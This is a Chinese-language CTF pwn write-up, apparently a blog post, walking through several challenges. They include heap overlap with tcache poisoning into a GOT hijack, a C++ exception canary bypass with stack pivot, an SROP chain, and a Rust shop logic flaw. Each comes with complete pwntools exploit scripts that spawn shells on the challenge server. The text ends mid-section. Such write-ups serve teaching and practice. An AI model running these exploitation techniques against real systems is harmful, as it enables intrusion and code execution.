\u7a0b\u5e8f\u4e2d create \u51fd\u6570\u5141\u8bb8\u7528\u6237\u6307\u5b9a\u5806\u5757\u5927\u5c0f\uff0c\u800c edit \u51fd\u6570\u56fa\u5b9a\u8bfb\u53d6 0x20 \u5b57\u8282\u3002\n\u5f53\u7533\u8bf7\u5927\u5c0f\u4e3a 24 (0x18) \u65f6\uff0c\u7cfb\u7edf\u5206\u914d 0x20 \u5927\u5c0f\u7684 Chunk\uff080x18 \u7528\u6237\u6570\u636e + 0x8 \u5757\u5934\uff09\u3002\u6b64\u65f6 edit \u7684 0x20 \u5b57\u8282\u5199\u5165\u4f1a\u586b\u6ee1\u5f53\u524d\u7684 0x18 \u7528\u6237\u6570\u636e\uff0c\u5e76\u6ea2\u51fa 8\u5b57\u8282 \u5230\u4e0b\u4e00\u4e2a Chunk \u7684 Header\uff0c\u8986\u76d6\u5176 Size \u5b57\u6bb5\u3002<\/code><\/pre>\n\n\n\n
\u5229\u7528\u601d\u8def\uff1a<\/strong><\/p>\n\n\n\n
\u6784\u9020\u5806\u5757\u91cd\u53e0\uff1a\n\u5206\u914d\u4e09\u4e2a\u8282\u70b9 A\u3001B\u3001C\u3002\u91ca\u653e B \u548c C\uff0c\u901a\u8fc7\u7f16\u8f91 A\uff0c\u6ea2\u51fa\u8986\u76d6 B \u7684 Size \u5b57\u6bb5\uff0c\u5c06\u5176\u4ece 0x21 \u4fee\u6539\u4e3a 0x61\uff08\u8986\u76d6\u4e86 B\u3001B\u7684\u5185\u5bb9\u5757\u3001C\uff09\u3002\n\nTcache \u6295\u6bd2\uff1a\n\u91cd\u65b0\u7533\u8bf7 B\uff08\u6d88\u8017 Tcache 0x20\uff09\uff0c\u7136\u540e\u91ca\u653e B\u3002\u6b64\u65f6 Free \u68c0\u6d4b\u5230 Size \u4e3a 0x61\uff0c\u5c06\u5176\u653e\u5165 Tcache 0x60\u3002\u540c\u65f6 B \u7684\u5185\u5bb9\u5757\uff08Size 0x21\uff09\u88ab\u653e\u5165 Tcache 0x20\u3002\n\n\u63a7\u5236\u8282\u70b9\u7ed3\u6784\u4f53\uff1a\n\u7533\u8bf7\u4e00\u4e2a\u5927\u8282\u70b9 D\uff08Size 88\uff09\u3002\nNode D \u7ed3\u6784\u4f53\u5206\u914d\u65f6\u53d6 Tcache 0x20\uff08\u539f B \u7684\u5185\u5bb9\u5757\uff09\u3002\nContent D \u5206\u914d\u65f6\u53d6 Tcache 0x60\uff08\u539f B \u7684\u8282\u70b9\u5757\uff09\u3002\n\u73b0\u8c61\uff1aNode D \u7684\u7ed3\u6784\u4f53\u5b9e\u9645\u4e0a\u4f4d\u4e8e Content D \u7684\u6570\u636e\u533a\u57df\u5185\u90e8\uff08\u504f\u79fb 32 \u5b57\u8282\u5904\uff09\u3002\n\n\u52ab\u6301 GOT \u8868\uff1a\n\u5728\u5199\u5165 Content D \u65f6\uff0c\u76f4\u63a5\u4f2a\u9020\u5185\u90e8\u7684 Node D \u7ed3\u6784\u4f53\uff0c\u5c06\u5176 content \u6307\u9488\u6307\u5411 free@got\u3002\n\nLeak & GetShell\uff1a\nshow \u6cc4\u9732 free \u5730\u5740\uff0c\u8ba1\u7b97 Libc\u57fa\u5740\u3002\nedit \u4fee\u6539 free@got \u4e3a system \u5730\u5740\u3002\n\u521b\u5efa \/bin\/sh \u8282\u70b9\u5e76\u5220\u9664\uff0c\u89e6\u53d1 free(\"\/bin\/sh\") -> system(\"\/bin\/sh\")\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\n\ncontext.log_level = 'debug'\ncontext.arch = 'amd64'\n\nbinary = '.\/vuln'\nlibc_file = '.\/libc-2.31.so'\n\nelf = ELF(binary)\nlibc = ELF(libc_file)\n\np = remote('challenge.shc.tf', 31028)\n\ndef create(size, content):\n    p.sendlineafter(b'choice?n', b'1')\n    p.sendlineafter(b'size?n', str(size).encode())\n    p.sendafter(b'content?n', content)\n\ndef delete():\n    p.sendlineafter(b'choice?n', b'2')\n\ndef show():\n    p.sendlineafter(b'choice?n', b'3')\n\ndef edit(content):\n    p.sendlineafter(b'choice?n', b'4')\n    p.sendafter(b'content?n', content)\n\ncreate(24, b'A'*24)\ncreate(24, b'B'*24)\ncreate(24, b'C'*24)\n\ndelete()\ndelete()\n\nedit(b'A'*24 + p64(0x61))\n\ncreate(24, b'B'*24)\ndelete()\n\npayload = b'A'*32 + p64(elf.got['free']) + p64(0)\ncreate(88, payload)\n\nshow()\np.recvuntil(b'content: ')\nlibc.address = u64(p.recvline()[:-1].ljust(8, b'x00')) - libc.sym['free']\nsuccess(f'Libc: {hex(libc.address)}')\n\nedit(p64(libc.sym['system']))\n\ncreate(24, b'\/bin\/shx00')\ndelete()\n\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHC7F{4NyTh!n6_buT_oV3rIAP_m4K3_YOU_MucH_$tr0Nger}<\/code><\/pre>\n\n\n\n
cpp_canary<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5229\u7528 C++ \u5f02\u5e38\u5904\u7406\u673a\u5236\u7ed5\u8fc7 Canary \u4fdd\u62a4 \u5e76\u7ed3\u5408 Stack Pivot (\u6808\u8fc1\u79fb) \u83b7\u53d6 Shell \u7684\u9898\u76ee\u3002<\/p>\n\n\n\n
\u5b9a\u4f4d\u6ea2\u51fa\u70b9<\/p>\n\n\n\n
\u6253\u5f00 IDA \u5206\u6790 login<\/code> \u51fd\u6570\u3002 \u53ef\u4ee5\u770b\u5230 passwd<\/code> \u6570\u7ec4\u5927\u5c0f\u4ec5\u4e3a 16 \u5b57\u8282<\/strong> (0x10<\/code>)\uff0c\u4f46\u5728\u8bfb\u53d6\u65f6\u5374\u5141\u8bb8\u8bfb\u53d6 0x100 \u5b57\u8282<\/strong>\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
char passwd[16]; \/\/ [rsp+E0h] [rbp-40h]\n\/\/ ...\nprintf(\"password: \");\nread(0, passwd, 0x100u); \/\/ \u4e25\u91cd\u6808\u6ea2\u51fa\uff0c\u53ef\u8986\u76d6 Canary \u548c Saved RBP<\/code><\/pre>\n\n\n\n
\u5b9a\u4f4d\u5f02\u5e38\u89e6\u53d1\u70b9<\/p>\n\n\n\n
\u5728 login<\/code> \u51fd\u6570\u672b\u5c3e\u7684 User::operator==<\/code> \u68c0\u67e5\u4e2d\uff0c\u5b58\u5728\u4ee5\u4e0b\u903b\u8f91\uff1a<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\/\/ \u68c0\u67e5 key\nfor ( i = 0; i <= 2; ++i )\n{\n  \/\/ std::string::at() \u4f1a\u8fdb\u884c\u8fb9\u754c\u68c0\u67e5\n  v3 = *(_BYTE *)std::string::at(&this->key_, i); \n  \/\/ ...\n}<\/code><\/pre>\n\n\n\n
\u5982\u679c key \u7684\u957f\u5ea6\u4e3a 0\uff0c\u8c03\u7528 at(0) \u4f1a\u629b\u51fa std::out_of_range \u5f02\u5e38\u3002<\/code><\/pre>\n\n\n\n
\u5f02\u5e38\u5904\u7406\u6d41\u7a0b<\/p>\n\n\n\n
\u67e5\u770b main<\/code> \u51fd\u6570\uff0c\u53d1\u73b0\u5b58\u5728 try-catch<\/code> \u5757\uff1a<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
try {\n    login();\n} catch (...) {\n    \/\/ \u6355\u83b7\u5f02\u5e38\uff0c\u6253\u5370 Goodbye\n}\nreturn 0; \/\/ \u6267\u884c leave; ret<\/code><\/pre>\n\n\n\n
\u6f0f\u6d1e\u539f\u7406<\/p>\n\n\n\n
\u901a\u5e38\u60c5\u51b5\u4e0b\uff0c\u8986\u76d6 Canary \u4f1a\u5bfc\u81f4 __stack_chk_fail \u5f3a\u884c\u7ec8\u6b62\u7a0b\u5e8f\u3002\u4f46 C++ \u5f02\u5e38\u5904\u7406\u673a\u5236\uff08Stack Unwinding\uff09 \u6709\u4e00\u4e2a\u7279\u6027\uff1a\n\n\u5f53 login \u629b\u51fa\u5f02\u5e38\u65f6\uff0c\u7a0b\u5e8f\u6d41\u7a0b\u4f1a\u8df3\u8fc7 login \u51fd\u6570\u6b63\u5e38\u7684\u8fd4\u56de\u68c0\u67e5\uff08\u5373\u8df3\u8fc7 Canary \u68c0\u67e5\uff09\u3002\n\u5f02\u5e38\u88ab main \u6355\u83b7\u5904\u7406\u540e\uff0cmain \u51fd\u6570\u6b63\u5e38\u9000\u51fa\uff0c\u6267\u884c leave; ret\u3002\nleave \u6307\u4ee4\u7b49\u4ef7\u4e8e mov rsp, rbp; pop rbp\u3002\u5b83\u4f9d\u8d56\u6808\u4e0a\u7684 Saved RBP \u6765\u6062\u590d\u6808\u5e27\u3002\n\n\u653b\u51fb\u601d\u8def\uff1a \u901a\u8fc7 passwd \u7684\u6ea2\u51fa\u8986\u76d6 login \u6808\u5e27\u5e95\u90e8\u7684 Saved RBP\u3002\u5f53\u5f02\u5e38\u629b\u51fa\u56de\u5230 main \u5e76\u6267\u884c leave \u65f6\uff0cRSP \u4f1a\u88ab\u8fc1\u79fb\u5230\u6211\u4eec\u4f2a\u9020\u7684\u5730\u5740\uff08\u5373 passwd \u6216 username \u7f13\u51b2\u533a\uff09\uff0c\u7d27\u63a5\u7740\u7684 ret \u5c31\u4f1a\u6267\u884c\u6211\u4eec\u5e03\u7f6e\u5728\u90a3\u91cc\u7684\u540e\u95e8\u5730\u5740\u3002<\/code><\/pre>\n\n\n\n
\u5229\u7528\u6b65\u9aa4<\/p>\n\n\n\n
\u5e03\u7f6e Payload\uff1a\nUsername (rbp-0x50): \u586b\u5145 backdoor \u5730\u5740\uff08\u4f5c\u4e3a NOP Sled\uff09\u3002\nPassword (rbp-0x40): \u586b\u5145 backdoor \u5730\u5740\uff0c\u5e76\u5728\u7b2c 64 \u5b57\u8282\u540e\u8986\u76d6 Saved RBP \u7684\u6700\u4f4e\u4f4d\uff08LSB\uff09\u3002\n\n\u89e6\u53d1\u5f02\u5e38\uff1a\nKey: \u8f93\u5165 x00\u3002\u8fd9\u4f1a\u5bfc\u81f4 std::string \u6784\u9020\u4e3a\u7a7a\u4e32\uff0c\u89e6\u53d1 at(0) \u8d8a\u754c\u5f02\u5e38\uff0c\u4ece\u800c\u7ed5\u8fc7 Canary\u3002\n\n\u7206\u7834\u504f\u79fb \uff1a\n\u7531\u4e8e\u6808\u5730\u5740\u968f\u673a\u5316\uff0c\u6211\u4eec\u9700\u8981\u7206\u7834 Saved RBP \u7684\u6700\u4f4e 1 \u5b57\u8282\uff080x00-0xFF\uff09\u3002\n\u5b9e\u6d4b\u5728\u504f\u79fb\u4e3a 0x78 \u65f6\uff0cmain \u51fd\u6570\u7684 leave \u6307\u4ee4\u6210\u529f\u5c06 RSP \u52ab\u6301\u56de passwd \u7f13\u51b2\u533a\u5f00\u5934\uff0cret \u5f39\u51fa backdoor \u5730\u5740\u62ff\u5230 Shell\u3002<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\nimport time\n\nBACKDOOR_ADDR = 0x4025db\nHOST = 'challenge.shc.tf'\nPORT = 32620\n\ncontext.arch = 'amd64'\ncontext.log_level = 'error'\n\ndef probe(payload_len, pivot_byte):\n    io = None\n    try:\n        io = remote(HOST, PORT, timeout=2)\n\n        io.sendafter(b'username: ', p64(BACKDOOR_ADDR) * 2)\n\n        fill_count = payload_len \/\/ 8\n        payload = p64(BACKDOOR_ADDR) * fill_count\n        payload += b'A' * (payload_len - len(payload))\n        payload += p8(pivot_byte)\n\n        io.sendafter(b'password: ', payload)\n        io.sendafter(b'key: ', b'x00')\n\n        io.sendline(b'echo POWNED; id; cat flag')\n\n        start = time.time()\n        while time.time() - start < 1.5:\n            if io.can_recv():\n                data = io.recvrepeat(0.2)\n                if b'POWNED' in data or b'uid=' in data or b'flag{' in data:\n                    return data\n\n        io.close()\n        return None\n    except Exception:\n        if io: io.close()\n        return None\n\nprint(f\"[*] Targeting Backdoor: {hex(BACKDOOR_ADDR)}\")\nprint(\"[*] Starting Smart Fuzzing...\")\n\ntarget_lengths = [64, 56, 72] \n\nfor length in target_lengths:\n    for offset in range(0x00, 0x100, 4):\n        print(f\"r    [-] Testing Length: {length}, Offset: {hex(offset)}...\", end='')\n\n        flag_data = probe(length, offset)\n        if flag_data:\n            print(f\"nn[!!!] SUCCESS! Length: {length}, Offset: {hex(offset)}\")\n            print(f\"[+] Output:n{flag_data.decode(errors='ignore')}\")\n            exit(0)\n\nprint(\"n[-] Failed.\")<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{9a750135-0f75-4115-bb4f-5b9ccaf24dcc}<\/code><\/pre>\n\n\n\n
\u9636\u6bb52<\/strong><\/h2>\n\n\n\n
Earth_Online<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
IDA<\/strong> \u5206\u6790\u6f0f\u6d1e\u51fd\u6570:buy_house<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7a0b\u5e8f\u68c0\u67e5\u4e00\u4e2a\u5168\u5c40\u53d8\u91cf\uff08\u94b1\u5305\u4f59\u989d\/\u72b6\u6001\uff09\u3002\n\u5982\u679c\u901a\u8fc7\u68c0\u67e5\uff0c\u7a0b\u5e8f\u4f1a\u8be2\u95ee Enter size\u3002\n\u6f0f\u6d1e\u70b9\uff1a\u7a0b\u5e8f\u8c03\u7528 read(0, buf, size)\u3002\u8fd9\u91cc\u7684 buf \u662f\u6808\u4e0a\u7684\u5c40\u90e8\u53d8\u91cf\uff0c\u8ddd\u79bb RBP \u53ea\u6709 0x50 \u5b57\u8282\u5de6\u53f3\u3002\u4f46\u662f\uff0c\u5982\u679c\u6211\u4eec\u5728\u4e4b\u524d\u7684\u4ea4\u4e92\u4e2d\u8ba9\u7a0b\u5e8f\u8ba4\u4e3a\u6211\u4eec\u201c\u6709\u94b1\u201d\uff0c\u8fd9\u91cc\u7684 size \u53ef\u4ee5\u88ab\u8f93\u5165\u4e3a 512 \u751a\u81f3\u66f4\u5927\u3002\n\u6ea2\u51fa\uff1a\u5411 0x50 \u5927\u5c0f\u7684\u6808\u7f13\u51b2\u533a\u5199\u5165 512 \u5b57\u8282\uff0c\u76f4\u63a5\u8986\u76d6\u4e86 Saved RBP \u548c Return Address\u3002<\/code><\/pre>\n\n\n\n
\u7ed5\u8fc7\u68c0\u67e5<\/p>\n\n\n\n
\u901a\u8fc7\u9759\u6001\u5206\u6790\u53d1\u73b0\uff0c\u5fc5\u987b\u8ba9\u7a0b\u5e8f\u5185\u90e8\u7684\u8ba1\u6570\u5668\u8fbe\u5230\u4e00\u5b9a\u6570\u503c\u624d\u80fd\u89e6\u53d1\u5927\u989d\u8bfb\u53d6\u3002\u7ecf\u8fc7\u6d4b\u8bd5\uff0c\u6d41\u7a0b\u5982\u4e0b\uff1a<\/p>\n\n\n\n
\u5728\u201c\u8d2d\u4e70\u83dc\u5355\u201d\u5931\u8d25 3 \u6b21\u3002\n\u5207\u6362\u5230\u201c\u6253\u5de5\u83dc\u5355\u201d\u3002\n\u5728\u201c\u8d2d\u4e70\u83dc\u5355\u201d\u5931\u8d25 12 \u6b21\u3002\n\u6700\u540e\u8fdb\u5165\u9690\u85cf\u7684\u8d2d\u4e70\u903b\u8f91\u3002<\/code><\/pre>\n\n\n\n
\u6808\u8fc1\u79fb\u76ee\u6807\u5730\u5740 (BSS \u6bb5)
\u6211\u4eec\u9700\u8981\u4e00\u4e2a\u53ef\u8bfb\u5199\u4e14\u5730\u5740\u56fa\u5b9a\u7684\u533a\u57df\u6765\u4f2a\u9020\u6808\u3002<\/p>\n\n\n\n
readelf -S pwn | grep bss<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u627e\u5230 .bss<\/code> \u6bb5\u8d77\u59cb\u5730\u5740\u7ea6\u4e3a 0x406080<\/code>\u3002\u6211\u4eec\u9009\u53d6 0x406180<\/code> \u4f5c\u4e3a SROP \u7684\u65b0\u6808\u5e95\uff0c\u9009\u53d6 0x4060a0<\/code> (stderr \u6307\u9488\u9644\u8fd1) \u4f5c\u4e3a\u6cc4\u9732\u70b9\u3002<\/p>\n\n\n\n
\u6211\u4eec\u9700\u8981\u52ab\u6301\u8fd4\u56de\u5730\u5740\uff0c\u8df3\u56de\u5230\u7a0b\u5e8f\u4e2d\u539f\u672c\u7528\u6765\u6253\u5370 \u201cYou can write up to %d\u2026\u201d \u7684\u5730\u65b9\uff0c\u5229\u7528\u5b83\u6253\u5370\u51fa stderr<\/code> \u7684\u5730\u5740\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u67e5\u770b buy_house<\/code> \u7684\u6c47\u7f16\u89c6\u56fe\u3002\u627e\u5230\u8c03\u7528 printf<\/code> \u4e4b\u524d\u51e0\u884c\u6307\u4ee4\u7684\u5730\u5740\u3002
\u7ed3\u679c\uff1a0x40222d<\/code>\u3002<\/p>\n\n\n\n
checksec --file=pwn<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7a0b\u5e8f\u5f00\u542f\u4e86 NX\uff0c\u9700\u8981\u5229\u7528 Libc \u4e2d\u7684 Gadget\u3002<\/p>\n\n\n\n
\u67e5\u627e pop rax<\/code><\/p>\n\n\n\n
ROPgadget --binary libc.so.6 --only \"pop|ret\" | grep rax<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
0x000dd237<\/code> (\u504f\u79fb)<\/p>\n\n\n\n
\u67e5\u627e syscall<\/code><\/p>\n\n\n\n
ROPgadget --binary libc.so.6 --only \"syscall|ret\"<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
0x000288b5 (\u504f\u79fb)<\/p>\n\n\n\n
\u5229\u7528\u601d\u8def<\/p>\n\n\n\n
\u4ea4\u4e92\u7ed5\u8fc7\uff1a\u53d1\u9001\u7279\u5b9a\u5e8f\u5217\u7684\u64cd\u4f5c\uff0c\u8fdb\u5165\u6ea2\u51fa\u70b9\u3002\n\n\u6808\u8fc1\u79fb & Leak\uff1a\n\u8986\u76d6 RBP \u4e3a 0x4060f8 (BSS \u4e0a stderr \u6307\u9488\u9644\u8fd1)\u3002\n\u8986\u76d6 Ret Addr \u4e3a 0x40222d (Printf \u903b\u8f91)\u3002\n\u7a0b\u5e8f\u6267\u884c leave; ret \u540e\uff0cRBP \u88ab\u52ab\u6301\u3002\u968f\u540e\u7684 printf \u4f1a\u4f9d\u636e RBP \u8bfb\u53d6\u6808\u4e0a\u6570\u636e\uff0c\u5bfc\u81f4 stderr \u7684\u771f\u5b9e\u5730\u5740\u88ab\u6253\u5370\u51fa\u6765\u3002\n\u8ba1\u7b97 Libc Base = Leak_Addr - libc.sym['stderr']\u3002\n\nSROP\uff1a\n\u518d\u6b21\u5229\u7528 read \u8f93\u5165 Payload\u3002\n\u6784\u9020 SigreturnFrame\uff1a\u5c06 RIP \u6307\u5411 syscall\uff0cRAX \u8bbe\u4e3a 59 (execve)\uff0cRDI \u6307\u5411 \/bin\/sh\u3002\n\u53d1\u9001 Payload\uff0c\u89e6\u53d1 pop rax (15); syscall\u3002\n\u5185\u6838\u6062\u590d\u6211\u4eec\u4f2a\u9020\u7684\u5bc4\u5b58\u5668\u72b6\u6001\uff0c\u83b7\u5f97 Shell\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\n\nHOST = \"challenge.shc.tf\"\nPORT = 32435\nbinary = \".\/pwn\"\nlibc_file = \".\/libc.so.6\"\n\ncontext.log_level = \"info\"\ncontext.arch = \"amd64\"\ncontext.terminal = [\"\/bin\/sh\"]\n\nelf = ELF(binary)\nlibc = ELF(libc_file)\n\ndef get_shell():\n    try:\n        p = remote(HOST, PORT)\n    except:\n        print(\"Connection Failed\")\n        return\n\n    def fail_buy():\n        p.sendlineafter(b\"Choice $\", b\"3\")\n        p.sendlineafter(b\"Enter size $\", b\"1\")\n        try: p.recvuntil(b\"Transaction failed!\", timeout=0.1)\n        except: pass\n\n    for _ in range(3): fail_buy()\n    p.sendlineafter(b\"Choice $\", b\"2\")\n    for _ in range(12): fail_buy()\n    p.sendlineafter(b\"Choice $\", b\"2\")\n    p.sendlineafter(b\"Choice $\", b\"1\")\n    p.sendlineafter(b\"Choice $\", b\"4\")\n    p.sendlineafter(b\"Choice $\", b\"3\")\n\n    p.sendlineafter(b\"Enter size $\", b\"512\")\n    p.recvuntil(b\"(You can write up to \")\n    p.recvuntil(b\" characters) $\")\n\n    bss_base = 0x4060a0 \n    magic_ret = 0x40222d\n    fake_rbp = bss_base + 0x58\n\n    payload = b'A' * 0x50\n    payload += p64(fake_rbp)\n    payload += p64(magic_ret)\n    p.send(payload.ljust(0x80, b'x00'))\n\n    p.recvuntil(b\"Your dream house is \")\n    p.recvline()\n    p.recvuntil(b\"(You can write up to \")\n    leak_data = p.recvuntil(b\" characters\", drop=True)\n    libc_leak = int(leak_data)\n\n    libc_base = libc_leak - libc.sym['_IO_2_1_stderr_']\n    libc.address = libc_base\n    success(f\"Libc Base: {hex(libc_base)}\")\n\n    rop = ROP(libc)\n    pop_rax = rop.find_gadget(['pop rax', 'ret']).address\n    syscall = rop.find_gadget(['syscall', 'ret']).address\n    binsh = next(libc.search(b\"\/bin\/shx00\"))\n\n    new_stack_addr = 0x406180\n    frame_addr = new_stack_addr + 0x20\n    leave_ret = 0x402279\n\n    frame = SigreturnFrame()\n    frame.rax = 59\n    frame.rdi = binsh\n    frame.rsi = frame_addr + 0x100\n    frame.rdx = 0\n    frame.rip = syscall\n    frame.rsp = frame_addr + 0x200\n\n    payload2 = bytearray(b'A' * 1024)\n    payload2[0] = 0\n\n    off_rbp = fake_rbp - (bss_base + 0x8)\n    payload2[0x50:0x58] = p64(new_stack_addr)\n    payload2[0x58:0x60] = p64(leave_ret)\n\n    chain = flat([pop_rax, 15, syscall])\n    rop_start = (new_stack_addr + 8) - (bss_base + 0x8)\n    payload2[rop_start : rop_start + len(chain)] = chain\n\n    frame_bytes = bytes(frame)\n    frame_start = (frame_addr) - (bss_base + 0x8)\n    payload2[frame_start : frame_start + len(frame_bytes)] = frame_bytes\n\n    argv_start = (frame_addr + 0x100) - (bss_base + 0x8)\n    payload2[argv_start : argv_start + 16] = p64(binsh) + p64(0)\n\n    p.send(bytes(payload2))\n\n    sleep(0.5)\n    p.clean()\n    p.interactive()\n\nif __name__ == \"__main__\":\n    get_shell()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{18ea057d-9b15-4c35-93f0-5bbddc1581d2}<\/code><\/pre>\n\n\n\n
hello rust<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5546\u57ce\u529f\u80fd\u7684 Item 2 (\u5bf9\u7684\u5bf9\u7684\uff0c\u4e0d\u5bf9\u4e0d\u5bf9) \u5b58\u5728\u903b\u8f91\u8bbe\u8ba1\u7f3a\u9677\uff1a<\/p>\n\n\n\n
\u529f\u80fd: \u652f\u4ed8 200 \u5143\uff0c\u663e\u793a Flag \u7684\u524d N \u4f4d\u3002\n\u673a\u5236: \u6bcf\u6b21\u8d2d\u4e70\uff0cflag_idx \u52a0 1\u3002\n\u540e\u95e8: \u5f53\u8d2d\u4e70\u957f\u5ea6\u8fbe\u5230 flag \u603b\u957f\u5ea6\u7684\u4e00\u534a\u65f6 (len >> 1)\uff0c\u7a0b\u5e8f\u4f1a\u76f4\u63a5\u6253\u5370 \u5b8c\u6574 Flag\u3002\n\u89e3\u6cd5: \u5229\u7528 Item 1 (\u6253\u5de5) \u5faa\u73af\u8d5a\u53d6\u8db3\u591f\u91d1\u94b1\uff08\u7ea6 9000 \u5143\uff09\uff0c\u7136\u540e\u5faa\u73af\u8d2d\u4e70 Item 2 \u76f4\u5230 Flag \u5b8c\u6574\u8f93\u51fa\u3002<\/code><\/pre>\n\n\n\n
\u6838\u5fc3\u51fd\u6570<\/p>\n\n\n\n
\u51fd\u6570<\/th>\u6838\u5fc3\u4f5c\u7528<\/th><\/tr><\/thead>
handle()<\/code><\/td>\u4ea4\u4e92\u4e3b\u903b\u8f91\uff0c\u5904\u7406 5 \u4e2a\u9009\u9879\uff08\u6253\u5de5 \/ \u6d88\u8d39 \/ \u6539\u6635\u79f0 \/ \u72ec\u7acb\u5ba3\u8a00 \/ \u9000\u51fa\uff09<\/td><\/tr>
SimpleRng::next()<\/code><\/td>\u968f\u673a\u6570\u751f\u6210\uff08\u6253\u5de5\u8d5a\u94b1\u91d1\u989d\u7531\u5176\u51b3\u5b9a\uff09\uff1astate = state * 0x5851F42D4C957F2D + 0x14057B7EF767814F<\/code> \u540e\u53d6\u6a21<\/td><\/tr>
generate_fake_flag()<\/code><\/td>\u751f\u6210\u5047 flag\uff08\u5e72\u6270\u9879\uff09\uff0c\u771f flag \u9700\u6512\u94b1\u8d2d\u4e70<\/td><\/tr>
edit_name()<\/code><\/td>\u6635\u79f0\u4fee\u6539\uff08\u65e0\u5229\u7528\u4ef7\u503c\uff09<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\u903b\u8f91\u95ee\u9898\uff0c\u6ca1\u6709\u7528\u6f0f\u6d1e\u3002\u4e5f\u53ef\u4ee5\u7528\u6f0f\u6d1e\uff0c\u6211\u89c9\u5f97\u4e0d\u4f1a\u8fd9\u4e48\u7b80\u5355 \u5148\u770b\u770b\u53ef\u4ee5\u4e0d<\/p>\n\n\n\n
\u5faa\u73af\u6267\u884c\u300c\u6253\u5de5\u300d\u64cd\u4f5c\uff0c\u76f4\u5230\u4f59\u989d \u2265 9000<\/p>\n\n\n\n
\u5faa\u73af\u6267\u884c\u300c\u6d88\u8d39\u300d\u64cd\u4f5c\uff0c\u4ece\u8fd4\u56de\u5185\u5bb9\u4e2d\u5339\u914d\u5e76\u63d0\u53d6 flag<\/p>\n\n\n\n
\u7136\u540e\u8d2d\u4e70 \u9009\u62e90<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\nimport re\nimport time\n\nHOST = 'challenge.shc.tf'\nPORT = 31733\ncontext.log_level = 'info'\n\ndef solve():\n    try:\n        p = remote(HOST, PORT)\n        p.recvuntil(b'> ')\n\n        TARGET_MONEY = 9000\n\n        current_balance = 0\n        for i in range(500):\n            p.sendline(b'1')\n            res = p.recvuntil(b'> ')\n\n            if i % 10 == 0:\n                matches = re.findall(rb'xeffexa5(d+)', res)\n                if not matches:\n                    matches = re.findall(rb'xefxbfxa5(d+)', res)\n\n                if matches:\n                    current_balance = int(matches[-1])\n                    if current_balance >= TARGET_MONEY:\n                        break\n\n        if current_balance < TARGET_MONEY:\n            return\n\n        for i in range(50):\n            p.sendline(b'2')\n            p.recvuntil(b': ')\n            p.sendline(b'2')\n\n            res = p.recvuntil(b'> ').decode(errors='ignore')\n\n            full_match = re.search(r'((SHCTF|flag){.*?})', res)\n            if full_match:\n                print(f\"Flag: {full_match.group(1)}\")\n                return\n\n            part_match = re.search(r'\u5f53\u524d\u5df2\u8d2d\u4e70:s*([^sn]+)', res)\n            if part_match:\n                current_flag = part_match.group(1)\n                if current_flag.endswith('}'):\n                    print(f\"Flag: {current_flag}\")\n                    return\n\n            if \"\u4f59\u989d\u4e0d\u8db3\" in res:\n                break\n\n        p.interactive()\n\n    except Exception as e:\n        print(e)\n\nif __name__ == \"__main__\":\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{be50f294-36d8-7a1c-be50-f29436d87a1c}<\/code><\/pre>\n\n\n\n
\u5047\u7684\uff0c\u6211\u53bb….<\/p>\n\n\n\n
\u5728\u770b\u770b \u51fd\u6570<\/p>\n\n\n\n
\u770b\u63cf\u8ff0\u53d1\u73b0\u4e3b\u8981\u5229\u7528\u4e86 Rust \u7684 Mutex Poisoning\uff08\u4e92\u65a5\u9501\u4e2d\u6bd2\uff09 \u673a\u5236\u548c Trait Object\uff08\u7279\u5f81\u5bf9\u8c61\uff09 \u7684\u865a\u8868\u52ab\u6301\u3002<\/p>\n\n\n\n
\u89e6\u53d1 Panic \u8ba9\u9501\u4e2d\u6bd2<\/p>\n\n\n\n
Rust \u7684 Mutex<\/code> \u9501\u6709\u4e00\u4e2a\u7279\u6027\uff1a\u5982\u679c\u4e00\u4e2a\u7ebf\u7a0b\u5728\u6301\u6709\u9501\u7684\u65f6\u5019\u53d1\u751f\u4e86 Panic\uff08\u5d29\u6e83\uff09\uff0c\u8fd9\u4e2a\u9501\u5c31\u4f1a\u53d8\u6210 \u201cPoisoned\u201d\uff08\u4e2d\u6bd2\uff09\u72b6\u6001\u3002<\/p>\n\n\n\n
hello_rust::shopping_time<\/code>\u51fd\u6570 \u6570\u7ec4\u8d8a\u754c\u68c0\u67e5<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53d1\u9001 256<\/code> \u5bfc\u81f4\u7a0b\u5e8f Panic\uff0c\u8ba9\u9501\u4e2d\u6bd2\uff0c\u8fd9\u5c31\u6fc0\u6d3b\u4e86\u8fd9\u4e2a if<\/code> \u91cc\u9762\u7684\u4ee3\u7801\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5730\u5740\u6cc4\u9732<\/p>\n\n\n\n
